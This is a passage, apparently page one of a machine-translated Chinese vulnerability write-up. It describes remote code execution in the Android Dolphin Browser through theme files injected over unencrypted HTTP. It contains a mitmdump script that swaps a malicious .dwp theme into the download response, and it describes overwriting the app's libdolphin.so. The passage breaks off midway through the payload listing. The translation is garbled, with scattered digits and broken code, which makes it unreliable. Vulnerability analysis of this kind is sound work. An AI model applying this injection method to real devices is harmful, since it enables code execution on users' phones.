Android Dolphin Browser remote code execution-vulnerability warning-the black bar safety net

ID MYHACK58:62201566162
Type myhack58
Reporter 佚名
Modified 2015-08-25T00:00:00


The attacker has the ability to by Android the Dolphin Browser to control the user's network communication data, you can modify the download and application browser new theme function. By using this function, an attacker can write arbitrary files, these files will be in the user device browser environments into code execution. The entire attack only requires the user to do is select, Download, apply the theme. Off 2 0 1 5 year 7 month 2 7 day, the Google App Store, the data show, the Dolphin Browser already has 1 million downloads. Vulnerability analysis The Android version of the Dolphin Browser have a feature that allows the user through the download, apply the theme to the browser can be personalized. When the user selects a new theme, this theme will be the way through the HTTP for download: GET The theme file will be saved to the following location: root@hammerhead:/sdcard/Download # ls Red_roof. dwp The file extension“dwp”is only for the Dolphin Browser your own custom extension, and in fact this file is a simple zip file. $ file Red_roof. dwp Red_roof. dwp: Zip archive data, at least v2. 0 to extract When we detect where the content can be found which is used to apply the target theme of the special data: unzip-l Red_roof. dwp. orig Archive: Red_roof. dwp. orig Length Date Time Name -------- ---- ---- ---- 1 8 1 6 5 12-18-14 0 9:5 7 icon.jpg 2 3 7 12-19-14 1 4:3 5 theme. config 1 3 1 3 8 4 12-18-14 0 9:5 4 wallpaper.jpg -------- ------- 1 4 9 7 8 6 3 files Later on we select, Download, apply the theme for the reverse engineering process. Found this feature can also unzip the theme file and apply theme to the other configuration. Exploit In use, the first step that you want to proxy to download data communication and injection to modify the theme, which we need in the test apparatus to configure a proxy, then write a simple inline script to use mitmdump def request(context, flow): if not flow. request. host == "" \ or not flow. request. path. endswith(". dwp"): return

Build response

response = http. HTTPResponse([1, 1], 2 0 0, "OK", odict. ODictCaseless([["Content-Type", "application/zip"]]), "yo!")

Inject theme

try: with open("Red_roof. dwp", "r") as f: modified = f. read() response. content = modified response. headers["Content-Length"] = [len(modified)] f. close() except IOError as e: raise e

Return response

flow. reply(response) We also need to use the browser theme of the decompression process. Due to such cases a lot, here we do not continue to elaborate. The first verify will modify the theme injected to the download response, and the successful implementation of the Dolphin Browser the data directory is written to an arbitrary file. In order to gain code execution privileges, then we need to find a can be covered by the file. Inadvertently scan a scan, found one in the file directory into the library-libdolphin. so root@hammerhead:/data/data/mobi.mgeek.TunnyBrowser # cd files/ root@hammerhead:/data/data/mobi.mgeek.TunnyBrowser/files # ls AppEventsLogger. persistedevents EN icons_cache libdolphin. so name_service splash. on It would seem that God give us bread?, we can write the complete code implementation. Thus I produced a corresponding payload: unzip-l Red_roof. dwp Archive: Red_roof. dwp Length Date Time Name -------- ---- ---- ----

[1] [2] next